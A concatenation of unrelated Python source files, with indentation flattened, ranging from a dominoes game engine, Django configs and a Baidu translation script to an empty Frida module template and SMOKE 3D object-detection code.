else: # Game is over
return False
def play_turn(self, play_fresh=False):
domino, direction = self.query_move(self.current_player, play_fresh)
if domino is not None:
self.board.add_domino(domino, direction)
if not self.local:
self.shout(json.dumps(self.get_placement_rep(domino, direction)), "add_domino")
time.sleep(0)
self.players[self.current_player].remove_domino(domino)
self.whisper(self.players[self.current_player].get_hand_JSON(), self.current_player, "hand")
score = self.board.score_board()
self.players[self.current_player].add_points(score)
self.n_passes = 0
else: # Player passes
self.n_passes += 1
if self.n_passes == self.n_players:
return True
print(self.board)
return False
def next_turn(self) -> None:
"""Update the player to move."""
self.current_player = (self.current_player + 1) % self.n_players
def draw_hands(self, fresh_round=False):
while True:
self.pack = Pack()
hands = []
for i in range(self.n_players):
hands.append(self.pack.pull(self.hand_size))
if self.verify_hands(hands, check_any_double=fresh_round,
check_5_doubles=self.check_5_doubles):
for i in range(self.n_players):
self.players[i].assign_hand(hands[i])
self.whisper(self.players[i].get_hand_JSON(), i, "hand")
return
def verify_hands(self, hands, check_5_doubles=True, check_any_double=False):
if not check_5_doubles and not check_any_double:
return True
# Check that no hand has 5 doubles
no_doubles = True
for hand in hands:
n_doubles = len([d for d in hand if d.is_double()])
if check_5_doubles:
if n_doubles >= 5:
return False
if n_doubles > 0:
no_doubles = False
# Check that some hand has a double
if check_any_double:
if no_doubles:
return False
return True
def determine_first_player(self):
"""Determine who has the largest double, and thus who will play first.
Assumes each player's hand is assigned and a double exists among them."""
for i in range(6, -1, -1):
for p in range(self.n_players):
for d in self.players[p].get_hand():
if d.equals(i, i):
return p
raise Exception("Could not find double in player's hands")
def players_have_dominos(self):
return min([len(p.get_hand()) for p in self.players]) > 0
def game_is_over(self):
return max(self.get_scores(indexed=False)) >= self.win_threshold
def get_scores(self, indexed=True):
if indexed:
return {i: self.get_player_score(i) for i in range(len(self.players))}
else:
return [self.get_player_score(i) for i in range(len(self.players))]
def get_player_score(self, player):
return self.players[player].get_score()
def query_move(self, player, play_fresh=False):
while True:
possible_placements = self.board.get_valid_placements_for_hand(self.players[player].get_hand(), play_fresh)
pretty_placements = [(x[0], str(x[1]), x[2]) for x in possible_placements]
print("Possible placements:")
for el in pretty_placements:
print(" --- " + str(el))
if not self.local:
playable_dominos = [i for i in range(len(pretty_placements)) if len(pretty_placements[i][2]) > 0]
self.whisper(str(playable_dominos), player, "playable_dominos")
move_possible = any([len(t[-1]) > 0 for t in possible_placements])
if move_possible:
try:
query_msg = f"Player {player}, what domino do you select?\n"
if self.local:
domino_index = int(input(query_msg).strip())
else:
self.whisper(query_msg, player, "prompt")
response = self.get_response(player)
domino_index = int(response)
if not (0 <= domino_index < len(possible_placements)) or len(possible_placements[domino_index][-1]) == 0:
self.whisper("Invalid domino choice: " + str(domino_index), player, "error")
else:
domino = possible_placements[domino_index][1]
if len(possible_placements[domino_index][-1]) == 1:
direction = possible_placements[domino_index][-1][0]
return domino, direction
else:
while True:
query_msg = f"Player {player}, what direction do you select?\n"
if self.local:
direction = input(query_msg).strip()
else:
self.whisper(query_msg, player, "prompt")
response = self.get_response(player)
direction = response.strip().upper()
if direction not in possible_placements[domino_index][-1]:
self.whisper("Invalid direction: " + direction, player, "error")
else:
return domino, direction
except Exception as e:
self.whisper("Invalid input, try again", player, "error")
else:
pulled = self.pack.pull()
query_msg = f"Player {player}, you have no valid moves. Send a blank input to pull\n"
if self.local:
_ = input(query_msg)
else:
self.whisper(query_msg, player, "prompt")
_ = self.get_response(player)
if pulled is not None:
self.players[player].add_domino(pulled)
self.whisper(self.players[player].get_hand_JSON(), player, "hand")
else:
self.shout("Pack is empty, cannot pull. Skipping turn")
return None, None
def get_value_on_domino(self, player):
"""Get the value of a 'Domino' by a player, i.e. the sum, rounded to the
nearest 5, of the other players' hand totals."""
total = sum([p.hand_total() for i, p in enumerate(self.players) if i != player])
if total % 5 > 2:
total += (5 - (total % 5))
else:
total -= total % 5
return total
def get_blocked_result(self):
"""Find the player (if any) that wins points when the game is blocked and return
that player and the points they receive."""
totals = [p.hand_total() for p in self.players]
print("Totals:", {i: totals[i] for i in range(len(totals))})
if len([t for t in totals if t == min(totals)]) > 1:
# Multiple players have lowest count, so nobody gets points
return None, 0
else:
# Find the player with minimum score and the sum of the other players' hands, rounded to the nearest 5
scorer = totals.index(min(totals))
total = sum(totals) - min(totals)
if total % 5 > 2:
total += (5 - (total % 5))
else:
total -= total % 5
return scorer, total
def get_placement_rep(self, domino, direction):
rendered_position = self.board.get_rendered_position(domino, direction)
return {
"face1": domino.head(),
"face2": domino.tail(),
"face1loc": rendered_position["1"],
"face2loc": rendered_position["2"]
}
def show_scores(self):
print("Scores:", self.get_scores())
if not self.local:
self.shout(self.get_scores(), "scores")
def get_response(self, player : int, print_wait : bool = False) -> str:
"""Query server for a response."""
# if self._config.verbose:
# if print_wait:
# print("Waiting for a response from player {}...".format(player))
while True:
# if self.is_local_ai(player):
# response = self.local_ai_responses[player]
# else:
# response = self.query_f(player)
response = self.query_f(player)
if response == "No response":
time.sleep(0.01)
# time.sleep(self._config.engine_sleep_duration)
continue
elif response is not None:
return response
else:
assert False
def whisper(self, msg, player, tag=None):
print(player, ":", msg)
if not self.local:
self.whisper_f(msg, player, tag)
def shout(self, msg, tag=None):
print(msg)
if not self.local:
self.shout_f(msg, tag)
if __name__ == "__main__":
e = Engine()
winner = e.run_game()
|
from Vintageous import PluginLogger
import sublime
import os
_logger = PluginLogger(__name__)
class DotFile(object):
def __init__(self, path):
self.path = path
@staticmethod
def from_user():
path = os.path.join(sublime.packages_path(), 'User', '.vintageousrc')
return DotFile(path)
def run(self):
try:
with open(self.path, 'r') as f:
for line in f:
cmd, args = self.parse(line)
if cmd:
_logger.info('[DotFile] running: {0} {1}'.format(cmd, args))
sublime.active_window().run_command(cmd, args)
except FileNotFoundError:
pass
def parse(self, line):
try:
_logger.info('[DotFile] parsing line: {0}'.format(line))
if line.startswith((':map ')):
line = line[1:]
return ('ex_map', {'command_line': line.rstrip()})
if line.startswith((':omap ')):
line = line[len(':omap '):]
return ('ex_omap', {'cmd': line.rstrip()})
if line.startswith((':vmap ')):
line = line[len(':vmap '):]
return ('ex_vmap', {'cmd': line.rstrip()})
if line.startswith((':let ')):
line = line[1:]
return ('ex_let', {'command_line': line.strip()})
except Exception:
print('Vintageous: bad config in dotfile: "%s"' % line.rstrip())
_logger.debug('bad config inf dotfile: "%s"', line.rstrip())
return None, None
|
# Generated by Django 2.0.4 on 2018-06-19 01:41
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
('address', models.CharField(max_length=256)),
('city', models.CharField(max_length=256)),
('state', models.CharField(max_length=256)),
('start_date', models.CharField(max_length=256)),
('start_time', models.CharField(max_length=256)),
('end_date', models.CharField(max_length=100)),
('end_time', models.CharField(max_length=256)),
('image', models.ImageField(blank=True, null=True, upload_to='events/')),
('description', models.TextField()),
('code', models.CharField(max_length=256)),
],
),
]
|
from abc import ABCMeta, abstractmethod
from ..helpers import shell_helper
class AbstractResource(object):
__metaclass__ = ABCMeta
AFTER_TASKS_KEY = 'after_tasks'
@abstractmethod
def __init__(self, properties, global_variables=None):
self.properties = properties
self.global_variables = global_variables
self.name = properties['name']
self.action = properties.get('action', None)
self.sudo = properties.get('sudo', None)
self.after_tasks = properties.get('after_tasks', None)
@property
def properties(self):
return self.__properties
@properties.setter
def properties(self, properties):
self.__properties = properties
@property
def name(self):
return self.__name
@name.setter
def name(self, name):
self.__name = name
@property
def action(self):
return self.__action
@action.setter
def action(self, action):
self.__action = action
@property
def sudo(self):
return self.__sudo
@sudo.setter
def sudo(self, sudo):
self.__sudo = sudo
@property
def global_variables(self):
return self.__global_variables
@global_variables.setter
def global_variables(self, global_variables):
self.__global_variables = global_variables
@property
def after_tasks(self):
return self.__after_tasks
@after_tasks.setter
def after_tasks(self, after_tasks):
self.__after_tasks = after_tasks
@abstractmethod
def run(self):
pass
# check if sudo is enabled
def is_sudo_enabled(self):
# if self.sudo exists, it overwrites the global variable
if self.sudo is True or self.sudo is False:
return self.sudo
return True if self.global_variables and self.global_variables.is_sudo_enabled() is True else False
# run the shell command and print the output if is in debug mode
def _run_shell_command(self, command):
# determine sudo
sudo = 'sudo ' if self.is_sudo_enabled() is True else ''
output = shell_helper.ShellHelper.run_command(sudo + command)
if self.global_variables and self.global_variables.is_debug_mode() is True:
print('* Running: ' + command)
if output:
print('** Output: ')
print(output)
# make sure there is no whitespace in the output
return output.strip()
|
import math
import numpy as np
import statsmodels.api as stat
from scipy import stats
from matplotlib import pyplot as plt
#Question 1
alpha = 0
theta = 0
beta = 0.015
sigma_u = 0.053
sigma_v = 0.044
rho = -0.2 #-0.2 #-0.5
sigma_uv = rho*sigma_u*sigma_v
mean = [0, 0]
cov = [[sigma_u**2, sigma_uv], [sigma_uv, sigma_v**2]]
def reg(Y,X) :
X = stat.add_constant(X)
return [stat.OLS(Y,X).fit().params, stat.OLS(Y,X).fit().tvalues,stat.OLS(Y,X).fit().pvalues]
R=10
avg_beta = np.zeros(R)
fivepc_beta = np.zeros(R)
nnfivepc_beta = np.zeros(R)
Tau=120
for T in range(Tau,Tau*(R+1),Tau):
B=250
estAlpha = np.zeros(B)
estBeta = np.zeros(B)
tAlpha = np.zeros(B)
tBeta = np.zeros(B)
pAlpha = np.zeros(B)
pBeta = np.zeros(B)
for i in range(1,B+1):
uv=np.random.multivariate_normal(mean, cov, (T+1))
x=np.zeros(T+1)
for t in range(1,T+1):
x[t]= theta+ rho*x[t-1]+uv[t,1]
r = alpha +beta *x[0:T-1]+uv[1:T,0]
Z = x[0:T-1]
temp = reg(r,Z)
estAlpha[i-1] = temp[0][0]
estBeta[i-1] = temp[0][1]
tAlpha[i-1] = temp[1][0]
tBeta[i-1] = temp[1][1]
pAlpha[i-1] = temp[2][0]
pBeta[i-1] = temp[2][1]
tt=int(T/Tau)
avg_beta[tt-1] = np.average(estBeta)
fivepc_beta[tt-1] = np.percentile(estBeta,5)
nnfivepc_beta[tt-1] = np.percentile(estBeta,95)
plt.plot(range(Tau,Tau*(R+1),Tau), avg_beta)
plt.plot(range(Tau,Tau*(R+1),Tau), fivepc_beta)
plt.plot(range(Tau,Tau*(R+1),Tau), nnfivepc_beta)
|
"""
Hash table - example
"""
import ads_02_00_DB as DB
from B_Data_Structures.hashtable import HashTable
#ht.HashTable.SIZE = 20
def main():
agenda = HashTable()
print(agenda)
print()
for user in DB.user_to_add:
if agenda.insert(user[0], user):
print("User was added")
else:
print("User already has this key registered")
agenda.insert(0, "Teste1")
agenda.insert(10, "Teste2")
agenda.insert(11, "Teste3")
print()
print(agenda.get(0))
print(agenda.get("oscar@gmail.com"))
print(agenda.get("John"))
print()
print(agenda)
if __name__ == "__main__":
main()
print("Done!!")
|
###########################################################################
###########################################################################
##################TEST FUNCTION############################################
###########################################################################
###########################################################################
import numpy as np
import matplotlib.pyplot as plt
import scipy
def schwefel(x,arr,brr):
x = x.astype(float)
return 418.9829*len(x) - np.sum(x*np.sin(np.sqrt(np.abs(x))))
###########################################################################
def schwefel_gradient(x,*args):
x = x.astype(float)
indices = np.where(x==0)
x[indices] = 0.0001
return -(np.sin(np.sqrt(np.abs(x))) + (x*np.cos(np.sqrt(np.abs(x)))*(0.5/np.sqrt(np.abs(x))) * (np.sign(x))))
###########################################################################
def schwefel_hessian(x,*args):
x = x.astype(float)
e = 1e-4
hessian = np.zeros((len(x),len(x)))
for i in range(len(hessian)):
x_aux1 = np.array(x)
x_aux1[i] = x[i] + e
x_aux2 = np.array(x)
x_aux2[i] = x[i] - e
a = (((schwefel_gradient(x_aux1,args) - schwefel_gradient(x_aux2,args))/(2.0*e)))
hessian[i,i] = a[i]
return hessian
###########################################################################
def non_diff(x):
p = np.array([2,2])
if np.linalg.norm(np.subtract(p,x))<1.0: return -1.0
else: return 0.0
###########################################################################
def non_diff_grad(x):
return np.zeros((len(x)))
###########################################################################
def non_diff_hess(x):
return np.zeros((len(x),len(x)))
###########################################################################
def plot_schwefel(bounds = [[-500,500],[-500,500]], resolution = 100, points = None, deflation_points = None):
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
X = np.linspace(bounds[0][0], bounds[0][1], resolution)
Y = np.linspace(bounds[1][0], bounds[1][1], resolution)
X, Y = np.meshgrid(X, Y)
schwefel = np.empty((X.shape))
gr = np.empty((X.shape))
for i in range(len(X)):
for j in range(len(Y)):
schwefel[i,j] = self.schwefel(np.array([X[i,j],Y[i,j]]))
if deflation_points is not None:
gr[i,j] = self.schwefel_gradient(np.array([X[i,j],Y[i,j]]))[0] * self.deflation_function(np.array([[X[i,j],Y[i,j]]]), deflation_points)
#gr[i,j] = self.deflation_function(np.array([[X[i,j],Y[i,j]]]), deflation_points)
fig = plt.figure(0)
a = plt.pcolormesh(X, Y, schwefel, cmap=cm.viridis)
plt.colorbar(a)
if points is not None: plt.scatter(points[:,0], points[:,1])
if len(deflation_points) != 0: plt.scatter(deflation_points[:,0], deflation_points[:,1])
plt.show()
###########################################################################
|
from django.contrib import admin
from .models import DepartmentInfo, Designation, ExtraInfo, Faculty, Staff, HoldsDesignation
# Register your models here.
admin.site.register(ExtraInfo)
admin.site.register(Staff)
admin.site.register(Faculty)
admin.site.register(DepartmentInfo)
admin.site.register(Designation)
admin.site.register(HoldsDesignation)
|
a = int(input('digite el primer nro '))
b = int(input('digite el segundo nro '))
if a == b:
print('SON IGUALES')
|
#!/usr/bin/python
#-*- coding:utf-8 -*-
# 百度翻译 API 文档:http://api.fanyi.baidu.com/api/trans/product/apidoc
import httplib
import md5
import urllib
import random
import re
import json
import os
import sys
kBaiduAppID = 'Please generate from you Baidu developer center' # 百度开发管理后台申请的 AppID
kBaiduSecretKey = 'Please generate from you Baidu developer center' # 百度开发管理后台申请的 SecretKey
gStringsFileName = ''
gStringsKeyList = []
gStringsValueList = []
gAllSupportedLangList = ['auto', 'zh', 'en', 'yue', 'wyw', 'jp', 'kor', 'fra', 'spa', 'th', 'ara', 'ru', 'pt', 'de', 'it', 'el', 'nl', 'pl', 'bul', 'est', 'dan', 'fin', 'cs', 'rom', 'slo', 'swe', 'hu', 'cht', 'vie']
reload(sys)
sys.setdefaultencoding( "utf-8" )
def initStringsKeyValueFromFile(fileName):
global gStringsFileName
global gStringsKeyList
global gStringsValueList
gStringsFileName = fileName
try:
f = open(fileName, 'r')
lines = f.readlines()
except IOError as e:
print e
else:
for line in lines:
match = re.search(r'"(?P<key>.*?)" = "(?P<value>.*?)"', line)
if match:
gStringsKeyList.append(match.group('key'))
gStringsValueList.append(match.group('value'))
else:
# 为了保存注释或空行到新的翻译文件
gStringsKeyList.append(line)
gStringsValueList.append('')
finally:
f.close()
def translateToLanguageList(fromLang, toLangs):
if fromLang not in gAllSupportedLangList:
print fromLang + 'is not supported'
return
for toLang in toLangs:
if toLang not in gAllSupportedLangList:
print toLang + 'is not supported'
break
translateToLang(fromLang, toLang)
def translateToLang(fromLang, toLang):
httpClient = None
myurl = '/api/trans/vip/translate'
httpClient = httplib.HTTPConnection('api.fanyi.baidu.com')
extension = os.path.splitext(gStringsFileName)[1]
toFileName = gStringsFileName.replace(extension, '_' + toLang + extension)
toFile = open(toFileName, 'w');
print 'Translating ' + toLang + ' to fileName: ' + toFileName
for index,val in enumerate(gStringsValueList):
q = val
if q:
salt = random.randint(32768, 65536)
sign = kBaiduAppID + q + str(salt) + kBaiduSecretKey
m1 = md5.new()
m1.update(sign)
sign = m1.hexdigest()
myurl = myurl + '?appid=' + kBaiduAppID + '&q=' + urllib.quote(q) + '&from=' + fromLang + '&to=' + toLang + '&salt=' + str(salt) + '&sign=' + sign
try:
httpClient.request('GET', myurl)
#response是HTTPResponse对象
response = httpClient.getresponse()
jsonData = json.loads(response.read())
dst = jsonData['trans_result'][0]['dst']
result = '"' + gStringsKeyList[index] + '" = "' + dst + '";\n'
toFile.write(result)
except Exception, e:
print e
else:
# 不需要翻译,直接保存原来的 Key
toFile.write(gStringsKeyList[index])
if httpClient:
httpClient.close()
if toFile:
toFile.close()
print 'Finished translating to ' + toLang
fileName = raw_input('Enter a fileName: ')
initStringsKeyValueFromFile(fileName)
print 'Supports languages:'
print gAllSupportedLangList
fromLang = raw_input('Enter from language: ')
toLangs = raw_input('Enter to language list, split by space: ')
print 'Start'
translateToLanguageList(fromLang, toLangs.split())
print 'All done!'
|
from core.framework.module import FridaModule
class Module(FridaModule):
meta = {
'name': 'Title',
'author': '@AUTHOR (@MWRLabs)',
'description': 'Description',
'options': (
),
}
# ==================================================================================================================
# UTILS
# ==================================================================================================================
# ==================================================================================================================
# RUN
# ==================================================================================================================
def module_run(self):
pass
|
from django.urls import path
from .views import teacher as teacher_view
from .views import student as student_view
from .views import notification as notification_view
from .views import common as common_view
from .views import statistics as statistics_view
urlpatterns = [
path('', common_view.index, name='index'),
path('find-task/<int:task_id>/<str:login>/', student_view.find_task_detail, name='find_task_detail'),
path('task/<int:assignment_id>/<str:login>/', student_view.task_detail, name='task_detail'),
path('task/<int:assignment_id>/<str:login>/<int:submit_num>/', student_view.task_detail, name='task_detail'),
path('task/<int:assignment_id>/<str:login>/<int:submit_a>-<int:submit_b>.diff', student_view.submit_diff, name='submits_diff'),
path('task/<int:assignment_id>/<str:login>/<int:submit_num>/download', student_view.submit_download, name='submit_download'),
path('task/<int:assignment_id>/<str:login>/<int:submit_num>/comments', student_view.submit_comments, name='submit_comments'),
path('task/<int:assignment_id>/<str:login>/<int:submit_num>/result', student_view.upload_results),
path('task/<path:task_name>/asset/<path:path>', student_view.task_asset, name='task_asset'),
path('task/<path:task_name>/tests/<str:test_name>/<str:file>', student_view.raw_test_content, name='raw_test_content'),
path('task/<path:task_name>.tar.gz', student_view.tar_test_data, name='tar_test_data'),
path('result/<int:submit_id>/<str:test_name>/<str:result_type>/<str:file>', student_view.raw_result_content, name='raw_result_content'),
path('submit/<int:submit_id>/source/<path:path>', student_view.submit_source, name='submit_source'),
path('submit/<int:submit_id>/pipeline', student_view.pipeline_status),
# notifications
path('notification/all', notification_view.all_notifications),
path('notification/mark_as_read', notification_view.mark_as_read),
path('notification/mark_as_read/<int:notification_id>', notification_view.mark_as_read),
# teacher
path('teacher/task/<int:task_id>', teacher_view.teacher_task, name='teacher_task'),
path('teacher/task/<int:task_id>.tar', student_view.teacher_task_tar, name='teacher_task_tar'),
path('teacher/task/<int:task_id>/moss', teacher_view.teacher_task_moss_check, name='teacher_task_moss_check'),
path('submits', teacher_view.submits, name='submits'),
path('submits/<str:student_username>', teacher_view.submits, name='submits'),
path('statistics/task/<int:task_id>', statistics_view.for_task, name='task_stats'),
path('statistics/assignment/<int:assignment_id>', statistics_view.for_assignment, name='assignment'),
path('assignment/download/<int:assignment_id>', teacher_view.download_assignment_submits, name='download_assignment_submits'),
path('assignment/download/<int:assignment_id>/csv', teacher_view.download_csv_per_task, name='download_csv_per_task'),
path('assignment/show/<int:assignment_id>', teacher_view.show_assignment_submits, name='show_assignment_submits'),
path('task/show/<int:task_id>', teacher_view.show_task_submits, name='show_task_submits'),
path('submit/<int:submit_id>/points', teacher_view.submit_assign_points, name='submit_assign_points'),
path('class/download/<int:class_id>/csv', teacher_view.download_csv_per_class, name='download_csv_per_class'),
path('tasks', teacher_view.all_tasks, name='tasks'),
path('tasks/<str:subject__abbr>', teacher_view.all_tasks, name='tasks'),
path('reevaluate/<int:submit_id>', teacher_view.reevaluate, name='reevaluate'),
path('import', teacher_view.bulk_import),
path('api_token', common_view.api_token),
]
|
import torch
from torch.nn import functional as F
import torch.nn as nn
import math
from ..model_utils.weight_process import _fill_fc_weights, _HEAD_NORM_SPECS
from ..model_utils.center_based_utils import sigmoid_hm, select_point_of_interest, nms_hm, select_topk
def get_channel_spec(reg_channels, name):
if name == "dim":
s = sum(reg_channels[:2])
e = sum(reg_channels[:3])
elif name == "ori":
s = sum(reg_channels[:3])
e = sum(reg_channels)
return slice(s, e, 1)
class SMOKEPredictor(nn.Module):
def __init__(self, heads, in_channels):
super(SMOKEPredictor, self).__init__()
classes = len(heads["class"])
regression = heads["reg"]
regression_channels = heads["reg_c"]
head_conv = 256
norm_func = _HEAD_NORM_SPECS[heads["norm"]]
assert sum(regression_channels) == regression, \
"the sum of {} must be equal to regression channel of {}".format(
regression, regression_channels
)
self.dim_channel = get_channel_spec(regression_channels, name="dim")
self.ori_channel = get_channel_spec(regression_channels, name="ori")
self.class_head = nn.Sequential(
nn.Conv2d(in_channels,
head_conv,
kernel_size=3,
padding=1,
bias=True),
norm_func(head_conv),
nn.ReLU(inplace=True),
nn.Conv2d(head_conv,
classes,
kernel_size=1,
padding=1 // 2,
bias=True)
)
# todo: what is datafill here
self.class_head[-1].bias.data.fill_(-2.19)
self.regression_head = nn.Sequential(
nn.Conv2d(in_channels,
head_conv,
kernel_size=3,
padding=1,
bias=True),
norm_func(head_conv),
nn.ReLU(inplace=True),
nn.Conv2d(head_conv,
regression,
kernel_size=1,
padding=1 // 2,
bias=True)
)
_fill_fc_weights(self.regression_head)
def forward(self, features):
head_class = self.class_head(features)
head_regression = self.regression_head(features)
head_class = sigmoid_hm(head_class)
# (N, C, H, W)
offset_dims = head_regression[:, self.dim_channel, ...].clone()
head_regression[:, self.dim_channel, ...] = torch.sigmoid(offset_dims) - 0.5
vector_ori = head_regression[:, self.ori_channel, ...].clone()
head_regression[:, self.ori_channel, ...] = F.normalize(vector_ori)
return [head_class, head_regression]
class SMOKECoder():
def __init__(self, depth_ref, dim_ref, device="cuda"):
self.depth_ref = torch.as_tensor(depth_ref).to(device=device)
self.dim_ref = torch.as_tensor(dim_ref).to(device=device)
def encode_box2d(self, K, rotys, dims, locs, img_size):
device = rotys.device
K = K.to(device=device)
img_size = img_size.flatten()
box3d = self.encode_box3d(rotys, dims, locs)
N = box3d.shape[0]
batch_size = rotys.shape[0]
K = K.type(box3d.type())
K = K.repeat(N//batch_size, 1, 1).view(-1, 3, 3)
box3d_image = torch.matmul(K, box3d)
box3d_image = box3d_image[:, :2, :] / box3d_image[:, 2, :].view(
box3d.shape[0], 1, box3d.shape[2]
)
xmins, _ = box3d_image[:, 0, :].min(dim=1)
xmaxs, _ = box3d_image[:, 0, :].max(dim=1)
ymins, _ = box3d_image[:, 1, :].min(dim=1)
ymaxs, _ = box3d_image[:, 1, :].max(dim=1)
xmins = xmins.clamp(0, img_size[0])
xmaxs = xmaxs.clamp(0, img_size[0])
ymins = ymins.clamp(0, img_size[1])
ymaxs = ymaxs.clamp(0, img_size[1])
bboxfrom3d = torch.cat((xmins.unsqueeze(1), ymins.unsqueeze(1),
xmaxs.unsqueeze(1), ymaxs.unsqueeze(1)), dim=1)
return bboxfrom3d
@staticmethod
def rad_to_matrix(rotys, N):
device = rotys.device
cos, sin = rotys.cos(), rotys.sin()
i_temp = torch.tensor([[1, 0, 1],
[0, 1, 0],
[-1, 0, 1]]).to(dtype=torch.float32,
device=device)
ry = i_temp.repeat(N, 1).view(N, -1, 3)
ry[:, 0, 0] *= cos.squeeze()
ry[:, 0, 2] *= sin.squeeze()
ry[:, 2, 0] *= sin.squeeze()
ry[:, 2, 2] *= cos.squeeze()
return ry
def encode_box3d(self, rotys, dims, locs):
'''
construct 3d bounding box for each object.
Args:
rotys: rotation in shape N
dims: dimensions of objects
locs: locations of objects
Returns:
'''
rotys = rotys.view(-1, 1)
dims = dims.view(-1, 3)
locs = locs.view(-1, 3)
device = rotys.device
N = rotys.shape[0]
ry = self.rad_to_matrix(rotys, N)
dims = dims.view(-1, 1).repeat(1, 8)
dims[::3, :4], dims[2::3, :4] = 0.5 * dims[::3, :4], 0.5 * dims[2::3, :4]
dims[::3, 4:], dims[2::3, 4:] = -0.5 * dims[::3, 4:], -0.5 * dims[2::3, 4:]
dims[1::3, :4], dims[1::3, 4:] = 0., -dims[1::3, 4:]
index = torch.tensor([[4, 0, 1, 2, 3, 5, 6, 7],
[4, 5, 0, 1, 6, 7, 2, 3],
[4, 5, 6, 0, 1, 2, 3, 7]]).repeat(N, 1).to(device=device)
box_3d_object = torch.gather(dims, 1, index)
box_3d = torch.matmul(ry, box_3d_object.view(N, 3, -1))
box_3d += locs.unsqueeze(-1).repeat(1, 1, 8)
return box_3d
def decode_depth(self, depths_offset):
'''
Transform depth offset to depth
'''
device = depths_offset.device
self.depth_ref[0] = self.depth_ref[0].to(device=device)
self.depth_ref[1] = self.depth_ref[1].to(device=device)
depth = depths_offset * self.depth_ref[1] + self.depth_ref[0]
return depth
def decode_location(self,
points,
points_offset,
depths,
Ks,
trans_mats):
'''
retrieve objects location in camera coordinate based on projected points
Args:
points: projected points on feature map in (x, y)
points_offset: project points offset in (delata_x, delta_y)
depths: object depth z
Ks: camera intrinsic matrix, shape = [N, 3, 3]
trans_mats: transformation matrix from image to feature map, shape = [N, 3, 3]
Returns:
locations: objects location, shape = [N, 3]
'''
# batch_size = trans_mats.shape[0]
# sub = torch.zeros(batch_size, 1, 3).float().to(trans_mats.device)
# sub[..., 2] = 1
# if (trans_mats.shape[1] == 2):
# trans_mats = torch.cat((trans_mats, sub), 1)
device = points.device
tensor_type = depths.type()
points = points.type(tensor_type)
points_offset = points_offset.type(tensor_type)
depths = depths.type(tensor_type)
Ks = Ks.type(tensor_type)
trans_mats = trans_mats.type(tensor_type)
points = points.to(device=device)
points_offset = points_offset.to(device=device)
depths = depths.to(device=device)
Ks = Ks.to(device=device)
trans_mats = trans_mats.to(device=device)
# number of points
N = points_offset.shape[1]
# batch size
N_batch = Ks.shape[0]
Ks_inv = Ks.inverse()
proj_points = points.type(tensor_type) + points_offset.type(tensor_type)
# transform project points in homogeneous form.
proj_points_extend = torch.cat(
(proj_points, torch.ones(N_batch, N, 1).type(tensor_type).to(device=device)), dim=2)
# transform project points back on image
proj_points_extend = proj_points_extend.type_as(trans_mats)
trans_mats = trans_mats.repeat(N, 1, 1)
proj_points_extend = proj_points_extend.view(-1, 3, 1)
proj_points_img = torch.matmul(trans_mats, proj_points_extend)
# with depth
proj_points_img = proj_points_img * depths.view(-1, 1, 1)
# transform image coordinates back to object locations
Ks_inv = Ks_inv.type_as(proj_points_img)
Ks_inv = Ks_inv.repeat(N, 1, 1)
locations = torch.matmul(Ks_inv, proj_points_img)
return locations.squeeze(2)
def decode_dimension(self, cls_id, dims_offset):
'''
retrieve object dimensions
Args:
cls_id: each object id
dims_offset: dimension offsets, shape = (N, 3)
Returns:
'''
cls_id = cls_id.flatten().long()
dims_select = self.dim_ref[cls_id, :]
dims_offset = dims_offset.view(-1, 3)
dims_select = dims_select.to(device=dims_offset.device)
dimensions = dims_offset.exp() * dims_select
return dimensions
def decode_orientation(self, vector_ori, locations, flip_mask=None):
'''
retrieve object orientation
Args:
vector_ori: local orientation in [sin, cos] format
locations: object location
Returns: for training we only need roty
for testing we need both alpha and roty
'''
device = locations.device
tensor_type = locations.type()
vector_ori = vector_ori.type(tensor_type)
vector_ori = vector_ori.to(device=device)
locations = locations.view(-1, 3)
vector_ori = vector_ori.view(-1, 2)
rays = torch.atan(locations[:, 0] / (locations[:, 2] + 1e-7))
alphas = torch.atan(vector_ori[:, 0] / (vector_ori[:, 1] + 1e-7))
# get cosine value positive and negtive index.
cos_pos_idx = (vector_ori[:, 1] >= 0).nonzero()
cos_neg_idx = (vector_ori[:, 1] < 0).nonzero()
alphas[cos_pos_idx] -= math.pi / 2
alphas[cos_neg_idx] += math.pi / 2
# retrieve object rotation y angle.
rotys = alphas + rays
# in training time, it does not matter if angle lies in [-PI, PI]
# it matters at inference time? todo: does it really matter if it exceeds.
larger_idx = (rotys > math.pi).nonzero()
small_idx = (rotys < -math.pi).nonzero()
if len(larger_idx) != 0:
rotys[larger_idx] -= 2 * math.pi
if len(small_idx) != 0:
rotys[small_idx] += 2 * math.pi
if flip_mask is not None:
flip_mask = flip_mask.view(-1, 1)
fm = flip_mask.flatten()
rotys_flip = fm.float() * rotys
rotys_flip_pos_idx = rotys_flip > 0
rotys_flip_neg_idx = rotys_flip < 0
rotys_flip[rotys_flip_pos_idx] -= math.pi
rotys_flip[rotys_flip_neg_idx] += math.pi
rotys_all = fm.float() * rotys_flip + (1 - fm.float()) * rotys
return rotys_all, alphas
else:
return rotys, alphas
class SMOKELossComputation():
def __init__(self,
smoke_coder,
cls_loss,
reg_loss,
loss_weight,
max_objs):
self.smoke_coder = smoke_coder
self.cls_loss = cls_loss
self.reg_loss = reg_loss
self.loss_weight = loss_weight
self.max_objs = max_objs
def prepare_targets(self, targets):
heatmaps = targets["hm"]
regression = targets["reg"]
cls_ids = targets["cls_ids"]
proj_points = targets["proj_points"]
dimensions = targets["dimensions"]
locations = targets["locations"]
rotys = targets["rotys"]
trans_mat = targets["trans_mat"]
K = targets["K"]
reg_mask = targets["reg_mask"]
flip_mask = targets["flip_mask"]
return heatmaps, regression, dict(cls_ids=cls_ids,
proj_points=proj_points,
dimensions=dimensions,
locations=locations,
rotys=rotys,
trans_mat=trans_mat,
K=K,
reg_mask=reg_mask,
flip_mask=flip_mask)
def prepare_predictions(self, targets_variables, pred_regression):
batch, channel = pred_regression.shape[0], pred_regression.shape[1]
targets_proj_points = targets_variables["proj_points"]
# obtain prediction from points of interests
pred_regression_pois = select_point_of_interest(
batch, targets_proj_points, pred_regression
)
# pred_regression_pois = pred_regression_pois.view(-1, channel)
# FIXME: fix hard code here
pred_depths_offset = pred_regression_pois[..., 0:1]
pred_proj_offsets = pred_regression_pois[..., 1:3]
pred_dimensions_offsets = pred_regression_pois[..., 3:6]
pred_orientation = pred_regression_pois[..., 6:]
pred_depths = self.smoke_coder.decode_depth(pred_depths_offset)
